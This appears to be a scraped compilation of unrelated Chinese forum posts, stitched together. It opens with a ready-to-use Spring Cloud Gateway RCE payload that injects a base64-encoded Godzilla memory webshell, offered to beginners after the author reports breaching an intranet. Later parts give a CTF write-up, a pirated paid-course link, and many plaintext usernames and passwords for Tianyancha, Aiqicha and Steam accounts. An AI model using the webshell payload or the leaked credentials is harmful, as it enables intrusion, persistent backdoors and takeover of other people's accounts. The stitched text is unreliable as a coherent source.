2022年7月

都在攻防啊,撞见一个SpringCloudGatewayRCE,可以新建路由,但是不能执行反弹shell的命令,随后测试发现应该存在ips或者waf,普通内存马,关键命令依然被阻断了。
随后翻了翻github,找到了哥斯拉的内存马代码:https://github.com/whwlsfb/cve-2022-22947-godzilla-memshell
感谢各位安全行业无私奉献的兄弟姐妹们!
随成功进入内网!
分享给小白的傻瓜payload:

{
"predicates":[{"name": "Path",
"args":{"_genkey_0":"/gmem/**"}
}
],
  "id": "wolaile",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBeAoADQC2BwC3CgACALYJABIAuAoAAgC5CQASALoKAAIAuwoAEgC8CQASAL0KAA0AvggAcgcAvwcAwAcAwQcAwgoADADDCgAOAMQHAMUIAJ8HAMYHAMcKAA8AyAsAyQDKCgASALYKAA4AywgAzAcAzQoAGwDOCADPBwDQBwDRCgDSANMKANIA1AoAHgDVBwDWCACBBwCECQDXANgKANcA2QgA2goA2wDcBwDdCgAVAN4KACoA3woA2wDgCgDbAOEIAOIKAOMA5AoAFQDlCgDjAOYHAOcKAOMA6AoAMwDpCgAzAOoKABUA6wgA7AoADADtCADuCgAMAO8IAPAIAPEKAAwA8ggA8wgA9AgA9QgA9ggA9wsAFAD4EgAAAP4KAP8BAAcBAQkBAgEDCgBHAQQKABsBBQsBBgEHCgASAQgKABIBCQkAEgEKCAELCwEMAQ0KABIBDgsBDAEPCAEQBwERCgBUALYKAA0BEgoAFQETCgANALsKAFQBFAoAEgEVCgAVARYKAP8BFwcBGAoAXQC2CABlCAEZAQAFc3RvcmUBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEABHBhc3MBABJMamF2YS9sYW5nL1N0cmluZzsBAANtZDUBAAJ4YwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAXTGNvbS9leGFtcGxlL0dNZW1TaGVsbDsBAAhkb0luamVjdAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAVcmVnaXN0ZXJIYW5kbGVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA5leGVjdXRlQ29tbWFuZAEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAANtc2cBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcGF0aAEADVN0YWNrTWFwVGFibGUHAM0HAMcBABBNZXRob2RQYXJhbWV0ZXJzAQALZGVmaW5lQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQABcwEAAW0BAAFaBwDFBwEaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAJicwEABXZhbHVlAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANjbWQBAF0oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTspTG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eTsBAAxidWZmZXJTdHJlYW0BAAJleAEABXBkYXRhAQAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTsBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA1TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9Qb3N0TWFwcGluZzsBAAQvY21kAQAMbGFtYmRhJGNtZCQwAQBHKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDspTHJlYWN0b3IvY29yZS9wdWJsaXNoZXIvTW9ubzsBAAZhcnJPdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQABZgEAAmlkAQAEZGF0YQEAKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDsBAAZyZXN1bHQBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7BwC3AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOR01lbVNoZWxsLmphdmEMAGkAagEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABlAGYMARsBHAwAaABmDAEdAR4MAGcAkgwAZwBmDAEfASABAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQBBb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8MASEBIgwBIwEkAQAVY29tL2V4YW1wbGUvR01lbVNoZWxsAQAwb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmVyL1NlcnZlcldlYkV4Y2hhbmdlAQAQamF2YS9sYW5nL1N0cmluZwwBJQEoBwEpDAEqASsMASwBLQEAAm9rAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwBLgBqAQAFZXJyb3IBABdqYXZhL25ldC9VUkxDbGFzc0xvYWRlcgEADGphdmEvbmV0L1VSTAcBLwwBMAExDAEyATMMAGkBNAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcBNQwBNgCZDAE3ATgBAANBRVMHARoMATkBOgEAH2phdmF4L2NyeXB0by9zcGVjL1NlY3JldEtleVNwZWMMATsBPAwAaQE9DAE+AT8MAUABQQEAA01ENQcBQgwBOQFDDAFEAUUMAUYBRwEAFGphdmEvbWF0aC9CaWdJbnRlZ2VyDAFIATwMAGkBSQwBHQFKDAFLAR4BABBqYXZhLnV0aWwuQmFzZTY0DAFMAU0BAApnZXRFbmNvZGVyDAFOASIBAA5lbmNvZGVUb1N0cmluZwEAFnN1bi5taXNjLkJBU0U2NEVuY29kZXIMAU8BUAEABmVuY29kZQEACmdldERlY29kZXIBAAZkZWNvZGUBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyDAFRAVIBABBCb290c3RyYXBNZXRob2RzDwYBUxABVA8HAVUQAKkMAVYBVwcBWAwBWQFaAQAnb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5BwFbDAFcAV0MAGkBXgwBXwEeBwFgDAFhAVQMAJwAnQwAiQCKDABhAGIBAAdwYXlsb2FkBwFiDAFjAVQMAIEAggwBZAFlAQAKcGFyYW1ldGVycwEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtDAFmAWcMAWgBaQwBagE8DACVAJYMAWgBSgwBawFsAQARamF2YS91dGlsL0hhc2hNYXABABAzYzZlMGI4YTljMTUyMjRhAQATamF2YXgvY3J5cHRvL0NpcGhlcgEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABXBhdGhzAQAHQnVpbGRlcgEADElubmVyQ2xhc3NlcwEAYChbTGphdmEvbGFuZy9TdHJpbmc7KUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbyRCdWlsZGVyOwEASW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvJEJ1aWxkZXIBAAVidWlsZAEARSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAD3ByaW50U3RhY2tUcmFjZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQApKFtMamF2YS9uZXQvVVJMO0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEAC2dldEluc3RhbmNlAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAhnZXRCeXRlcwEABCgpW0IBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEABGluaXQBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEAB2RvRmluYWwBAAYoW0IpW0IBABtqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3QBADEoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3Q7AQAGbGVuZ3RoAQADKClJAQAGdXBkYXRlAQAHKFtCSUkpVgEABmRpZ2VzdAEABihJW0IpVgEAFShJKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvVXBwZXJDYXNlAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQALZ2V0Rm9ybURhdGEBAB8oKUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87CgFtAW4BACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwoAEgFvAQAFYXBwbHkBADYoTGNvbS9leGFtcGxlL0dNZW1TaGVsbDspTGphdmEvdXRpbC9mdW5jdGlvbi9GdW5jdGlvbjsBABtyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm8BAAdmbGF0TWFwAQA8KExqYXZhL3V0aWwvZnVuY3Rpb24vRnVuY3Rpb247KUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87AQAjb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXMBAAJPSwEAJUxvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czsBADooTGphdmEvbGFuZy9PYmplY3Q7TG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzOylWAQAKZ2V0TWVzc2FnZQEAJm9yZy9zcHJpbmdmcmFtZXdvcmsvdXRpbC9NdWx0aVZhbHVlTWFwAQAIZ2V0Rmlyc3QBAA1qYXZhL3V0aWwvTWFwAQADZ2V0AQADcHV0AQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQALdG9CeXRlQXJyYXkBAARqdXN0AQAxKExqYXZhL2xhbmcvT2JqZWN0OylMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwcBcAwBcQF0DACoAKkBACJqYXZhL2xhbmcvaW52b2tlL0xhbWJkYU1ldGFmYWN0b3J5AQALbWV0YWZhY3RvcnkHAXYBAAZMb29rdXABAMwoTGphdmEvbGFuZy9pbnZva2UvTWV0aG9kSGFuZGxlcyRMb29rdXA7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RUeXBlO0xqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RUeXBlOylMamF2YS9sYW5nL2ludm9rZS9DYWxsU2l0ZTsHAXcBACVqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZXMkTG9va3VwAQAeamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGVzACEAEgANAAAABAAJAGEAYgABAGMAAAACAGQACQBlAGYAAAAJAGcAZgAAAAkAaABmAAAACgABAGkAagABAGsAAAAvAAEAAQAAAAUqtwABsQAAAAIAbAAAAAYAAQAAABMAbQAAAAwAAQAA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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/gmem')}"
    }
  }],
  "uri": "http://test.com"
}

注意:内存马地址为:url+/gmem

作为一个安服仔,日常渗透中,不同阶段所使用的工具是不同的,除开自动化一条龙的脚本之外,很多时候是需要反复的进入不同的文件夹运行不同的命令,每次使用工具的时候命令可能也是一样的,那么是否有种方式将常用的工具,常用的命令集成在一起,渗透的时候仅需给定目标,就可以调用工具自动执行命令。之前流行过的GUI_Tools是一个,有了图形化页面,点击即可运行,但是一个是在Windows环境下界面实在不敢恭维,一个是无法更好的交互(或者也许我没找到交互的方式)。后来无意间发现了阿浪师傅写的一个自用的命令行调用工具,也就是Wanli的初始版本。最开始也在公众号文章说过,最初的设定是“把常用的工具给做了一个调用整合到一个程序内,功能拓展比较方便,目前是根据自己的一些习惯写的,比如目录扫描、子域名爆破+验证、漏洞扫描”。就相当于一个快捷启动工具,与GUI_Tools不同的是,Wanli可以更好的交互,执行自定义的命令。当然,并无比较的意思,两个师傅的工具都有在用(手动狗头 :)。

emmmmmm刚注册不久,发帖的编辑器不太会用,还是放图吧,
主界面:

输出:

配置文件:

工具分类:

地址:https://github.com/givemefivw/SecurityServiceBox

更新aria2c.exe主程序至最新版1.36.0:https://www.lanzoui.com/iruxH077khqd
更新AriaNg 至最新版本1.2.4单文件版:https://www.lanzoui.com/i42cP077kjmb

方法一:

自解压后
点击桌面“启动Aria2-AriaNg”图标或Aria2-AriaNg文件夹“aria2.exe”启动Aria2-AriaNg程序点击“新建”,复制需要下载的链接到“下载链接”框中,点击“立即下载”即可



方法二:

自解压后
点击桌面“运行Aria2系统托盘”图标或Aria2-AriaNg文件夹“a2tray.exe”运行Aria2系统托盘,然后点击桌面“启动AriaNg”图标或点击AriaNg文件夹中的index,在浏览器中启动Aria2-AriaNg程序点击“新建”,然后点击文件夹图标,点击“打开种子文件”或“打开 Metalink文件”或复制需要下载的链接到“下载链接”框中,点击“立即下载”即可


下载地址【更新为自解压版,更方便操作】:https://www.lanzoui.com/iLcIx078plif

整合内容

1、重写了启动器,替换了原版功能单一体积却达到1mb的启动器,并删除了原版携带的大量多余文件和资源,体积减小到2.28mb
2、为AriaNg图形化操作界面创建独立窗口进程,解决在浏览器内误操作关闭AriaNg页面的问题
3、添加在启动程序前检查主程序是否开启,如果已经开启则只启动AriaNg,解决多次启动导致多个主程序在后台占用大量内存的问题

文件说明

主目录内:
a2tray.exe - Aria2命令行程序的托盘图标,方便用户在任务栏管理主程序
aria2.conf - 已经配置好的Aria2配置文件,修改后可能导致程序无法运行
aria2.exe - Aria2的启动器。请在使用时仅运行此程序,不要运行a2tray.exe或aria2c.exe。具体功能见整合内容
aria2.session - 用于存储Aria2下载记录的文件,默认为空
aria2c.exe - Aria2主程序
AriaNg文件夹内:
favicon.ico,favicon.png,tileicon.png,touchicon.png - AriaNg图形化界面的图片资源,不可删除
index.html - AriaNg图形化界面。在被启动器启动时会被加载到mshta.exe内作为独立窗口启动,也可以手动双击以加载到浏览器内作为一个页面启动
robots.txt - AriaNg依赖的文件,作用不明。从文件内容看大概与用户代{过}{滤}理有关。不可删除

下载地址:
https://fastcoder.lanzoul.com/ikkec0785tza
密码:bxfh
另外,为了更好地方便交流学习,笔者开源了启动器aria2.exe(易语言编写):
https://fastcoder.lanzoul.com/i4Rfg07869kb
密码:3hbg

MISC

mahjoong
多开几个环境

自动对局 不知道为啥就出来了

ACTF{y@kumAn_1s_incredl3le}

emoji
Emoji表情符号解码

二进制转字符串

然后倒置

m1Sc_5I6niN

得到ACTF{m1Sc_5I6niN}

Web

babyshiro
题目名字提示shiro

查看文件 密码为vulhub

直接找到利用工具

爆破密钥和利用链

直接执行命令

cat /flag.txt无法读取

附件有个readflag

直接执行./readflag

得到flag


ACTF{We_CANn0T_0ff3r_yOU_41L_xS$_ChAL1ENG3S}

beadmin


注册admin 提示已存在

随意注册


访问flag是假的


继续看代码

Dockfile ENV设置环境变量 password

admin.js中表示环境变量的password


信息泄露 直接登录

访问flag即可

ACTF{3asy_csrf_and_bypass_stup1d_tok3n_g3n3rator}

写在后面

由于在准备考研课程,技术方面有点落下了,平时没有练习相关的CTF题目;

偶尔也打了几次比赛,但是明显没有之前的脑洞和思路;

比如本次比赛MISC的emoji,明明很早就解出字符串了,但是就是想不到倒置,拖了很长时间才想到;

另:shiro工具:https://github.com/j1anFen/shiro_attack

课程介绍:
课程来自艺泽影视的影视解说,短视频基础课,价值666元。从0基础到成熟运营,简单细节教学。系统学习解说,学习文案,剪辑,全平台运营。
课程目录:

01.电脑选配及电脑优化.mp4

02.网盘文件下载跟安装(重要).mp4

03内容定位及如何选片.mp4

04.素材下载及转码.mp4

05.看电影+写文案.mp4

06.文案配音.mp4

07.字幕制作.mp4

08.封面制作.mp4

09.PR基础介绍.mp4

10.代{过}{滤}理剪辑的使用.mp4

11.快捷键运用.mp4

12.PR高效率模板搭建.mp4

13.序列合并及批量高清导出.mp4

14.PR软件的下载及安装.mp4

15.PR锐化插件安装.mp4

16.PR新建项目及字幕设置.mp4

17.新建序列.mp4

18.横屏视频制作.mp4

19.三大剪辑方式介绍.mp4

20.声音处理.mp4

21.在视频中插入原声原画.mp4

22.调色,锐化(预设使用).mp4

23.横屏转竖屏.mp4

24.横屏合集制作.mp4

25.高清批量导出设置.mp4

26.剪辑实战01.mp4

27.剪辑实战02.mp4

28.剪辑实战03.mp4

29.剪辑实战04.mp4

30.真人配音01.mp4

31.真人配音02.mp4

32.真人配音03.mp4

33.真人配音04.mp4

34.文案课01.mp4

35.文案课02.mp4

36.文案课03.mp4

37.文案课04.mp4

38.文案课01.mp4

39.文案课02.mp4

41.文案课04.mp4

42.文案课05.mp4

43.文案课01.mp4

44.文案课02.mp4

45.文案课03.mp4

46.文案课04.mp4

47.文案课05.mp4

48.代理剪辑01.mp4

49.代理剪辑02.mp4

49.文案课03.mp4

艺泽影视·影视解说(完结)666元」等文件 https://www.aliyundrive.com/s/TznuRpHRxYA 点击链接保存,或者复制本段内容,打开「阿里云盘」APP ,无需下载极速在线查看,视频原画倍速播放。

如果提示账号需要验证码请及时提示我,请勿在手机app上登陆和改动账号信息。

天眼查
账号:13217436447 密码:Lsy20141109 有效期2024年03月07日

爱企查

账号: Liusoon97 密码:Lsy20141109 有效期:2022年09月28日

请勿改动账号信息以及消费积分和监控动态,下载不限
需要的朋友自行取用,使用完后及时退出勿占用账号资源

steam数款游戏帐号免费分享 第三期!
NBA 2K 17/19/共享steam账号共享Steam账号:
账号:zjc739192112密码:kkmmff999
该账号DLC信息:不包含DLC

艾尔登法环/免费共享steam账号共享Steam账号:
账号:teq7938密码:Dcb238497
该账号DLC信息:不包含DLC
STEAM官方售价:298¥

NBA2K20/共享steam账号共享Steam账号:
账号:nful136密码:gFlB)!0625!uI
该账号DLC信息:不包含DLC

巫师3:狂猎年度版/免费共享steam账号共享Steam账号:
账号:deicol163密码:073GvgltF3thj1Lh
该账号DLC信息:包含10个DLC
STEAM官方售价:127¥

消逝的光芒2/免费共享steam在线账号共享Steam账号1:
账号:jhjle6786密码:LP05067D
该账号DLC信息:不包含DLC
STEAM官方售价:299¥
共享Steam账号2:
账号:Uydgnbsdgd密码:YUaHJFDS2
该账号DLC信息:不包含DLC
STEAM官方售价:299¥
共享Steam账号3:
账号:es008723密码:Qd849321
该账号DLC信息:不包含DLC
STEAM官方售价:299¥
共享Steam账号4:
账号:agt8878密码:Hh9434932
该账号DLC信息:不包含DLC
STEAM官方售价:299¥
共享Steam账号5:
账号:uinxl60064密码:P5Z4hEkp8K04
该账号DLC信息:不包含DLC
STEAM官方售价:299¥
共享Steam账号6:
账号:sdxsdgm密码:Sd594568
该账号DLC信息:不包含DLC
STEAM官方售价:299¥

使命召唤9:黑色行动2/免费共享steam账号共享Steam账号:
账号:skresearch密码:eclipse34
该账号DLC信息:不包含DLC
STEAM官方售价:118¥

使命召唤11 高级战争/免费共享steam离线账号共享Steam账号:
账号:teq7938密码:Dcb238497
该账号DLC信息:包含1个DLC
提示:如果提示需要PIN码请输入 2222
STEAM官方售价:298¥

极限竞速:地平线5/免费共享steam账号共享Steam账号
账号:bejdw20022密码:Bejdw55522
该账号DLC信息:包含全DLCSTEAM官方售价:本体+DLC 共789¥

整理了数款steam游戏账号,现在免费分享给大家!!!

戴森球计划/Dyson共享Steam账户:
账号:dskemi3355
密码:kemi7645

仁王/Complete共享Steam账户:
账号:xxtx_renwang
密码:Hzww3453

哈迪斯/Hades共享Steam账户:
账号:yji347511
密码:Cazxe2534

茶杯头/Cuphead共享Steam账户:
账号:wgfmp457
密码:shkw42873H

小小噩梦1+2版本共享Steam账户:
账号:afg875
密码:Abc87350

幽灵行者/Ghost共享Steam账户:
账号:junjun888666673
密码:jiaoaojunjun760210

烟火/Firework共享Steam账户:
账号:banmagame1124
密码:banmagame0177

掘地求升/Getting/和班尼特福迪一起攻克难关共享Steam账户:
账号:huanyu87962123
密码:Huanyu8536555

乞丐模拟器/Hobo共享Steam账户:
账号:p9158
密码:q5686790

深海迷航/Subna共享Steam账户:
账号:yyouxxi66544
密码:jjdian35477

当铺人生2/Dealer's共享Steam账户:
账号:y8fnij
密码:acM187b1

港诡实录共享Steam账户:
账号:clixianwan8
密码:Hh6039518
内涵几十款小游戏

死亡细胞/Dead Cells共享Steam账户:
账号:annnr231
密码:bua999701N

